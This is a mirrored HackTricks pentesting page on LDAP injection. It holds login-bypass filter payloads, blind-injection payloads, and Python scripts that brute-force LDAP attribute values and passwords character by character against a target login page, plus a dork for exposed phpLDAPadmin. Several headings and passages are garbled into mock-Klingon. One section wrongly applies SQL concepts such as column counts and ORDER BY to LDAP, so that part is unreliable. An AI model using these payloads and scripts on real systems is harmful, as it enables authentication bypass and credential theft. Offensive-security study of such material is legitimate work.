Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/ldap-injection.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

14 KiB
Raw Permalink Blame History

LDAP Injection

LDAP Injection

htARTE (HackTricks AWS Red Team Expert) !HackTricks AWS Red Team Expert!

Other ways to support HackTricks:


Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

LDAP Injection

LDAP

If you want to know what is LDAP access the following page:

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}

LDAP Injection is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application fails to properly sanitize input, allowing attackers to manipulate LDAP statements through a local proxy, potentially leading to unauthorized access or data manipulation.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE

For example:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))

You can access to the database, and this can content information of a lot of different types.

OpenLDAP: If 2 filters arrive, only executes the first one.
ADAM or Microsoft LDS: With 2 filters they throw an error.
SunOne Directory Server 5.0: Execute both filters.

It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.

The filter has to start with: & or |
Example: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Then: (&(objectClass=*)(ObjectClass=*)) will be the first filter (the one executed).

Login Bypass

LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.

username=*
password=*)(&
--> (&(user=*)(password=*)(&))

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

qImHa'mo'

Blind LDAP Injection

vItlhutlh 'ej vItlhutlh responses qImHa'mo' vItlhutlh 'ej vItlhutlh data qar'a'neS je 'ej vItlhutlh Blind LDAP Injection vItlhutlh:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))

#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

qo' vItlhutlh

lo'laHbe'lu'chugh ASCII Hutlhbe'lu'chugh, HoS, 'ej chenmoHwI'be'lu'chugh:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Scripts

Discover valid LDAP fields

LDAP objects contains by default several attributes that could be used to save information. You can try to brute-force all of them to extract that info. You can find a list of default LDAP attributes here.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Qa'chuq Blind LDAP Injection (bIngDaq "*")

Description

LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory information services. LDAP injection is a type of attack that occurs when an attacker is able to manipulate an LDAP query in order to retrieve unauthorized information from the directory server.

In a blind LDAP injection attack, the attacker is unable to see the results of the injected query directly. However, by using boolean-based techniques, the attacker can infer information based on the behavior of the application's response.

This technique focuses on blind LDAP injection attacks where the application does not use the asterisk character ("*") to perform wildcard searches. Instead, it uses other characters or methods to search for specific values.

Exploitation

The exploitation of blind LDAP injection without the use of the asterisk character ("*") involves identifying the behavior of the application's response to infer information.

  1. Identify the Injection Point: Similar to other types of injection attacks, the first step is to identify the injection point within the application. This can be done by analyzing the application's behavior when certain input is provided.

  2. Determine the Number of Columns: In order to construct a valid LDAP query, it is necessary to determine the number of columns in the query result. This can be achieved by using the ORDER BY clause and incrementing the column number until an error or different behavior is observed in the application's response.

  3. Extract Information: Once the number of columns is determined, the attacker can use boolean-based techniques to extract information from the LDAP directory. By constructing queries that return true or false based on specific conditions, the attacker can infer information about the data stored in the directory.

  4. Enumerate Data: With the ability to extract information, the attacker can enumerate the data stored in the LDAP directory. This can be done by iterating through the columns and using boolean-based techniques to determine the values of each column.

Prevention

To prevent blind LDAP injection attacks without the use of the asterisk character ("*"), it is important to implement proper input validation and sanitization techniques. This includes:

  • Input Validation: Validate and sanitize all user input before using it in LDAP queries. This can help prevent malicious input from being injected into the query.

  • Parameterized Queries: Use parameterized queries or prepared statements to construct LDAP queries. This can help prevent the injection of malicious input by separating the query logic from the user input.

  • Least Privilege: Ensure that the LDAP service account used by the application has the least privilege necessary to perform its intended functions. This can help limit the potential impact of an LDAP injection attack.

  • Error Handling: Implement proper error handling mechanisms to prevent sensitive information from being leaked in error messages. Error messages should be generic and not disclose specific details about the LDAP query or directory structure.

References
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

Google Dorks

Description

Google Dorks are special search queries that can be used to find specific information on the internet. These queries are crafted using advanced operators and can help in discovering sensitive information that is not easily accessible through regular search methods.

Usage

Google Dorks can be used for various purposes, including:

  • Information Gathering: Google Dorks can be used to gather information about a target, such as finding subdomains, open directories, or specific file types.
  • Vulnerability Discovery: By using specific Google Dorks, it is possible to find websites or applications that are vulnerable to common security issues, such as SQL injection or cross-site scripting (XSS).
  • Data Breach Analysis: Google Dorks can be used to search for leaked data, such as usernames, passwords, or credit card numbers, that may have been exposed in data breaches.

Examples

Here are some examples of commonly used Google Dorks:

  • site:example.com - Searches for all indexed pages on the specified domain.
  • filetype:pdf site:example.com - Searches for PDF files on the specified domain.
  • intitle:"index of" site:example.com - Searches for open directories on the specified domain.
  • inurl:login site:example.com - Searches for login pages on the specified domain.
  • intext:"error message" site:example.com - Searches for pages containing a specific error message on the specified domain.

Note

While Google Dorks can be a powerful tool for information gathering and vulnerability discovery, it is important to use them responsibly and ethically. Always ensure that you have proper authorization before using Google Dorks on any target.

intitle:"phpLDAPadmin" inurl:cmd.php

tlhIngan Hol

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}


Bug bounty tip: Intigriti ghItlh bug bounty platform created by hackers, for hackers! https://go.intigriti.com/hacktricks join qaStaHvIS, $100,000 bounties earn!

{% embed url="https://go.intigriti.com/hacktricks" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: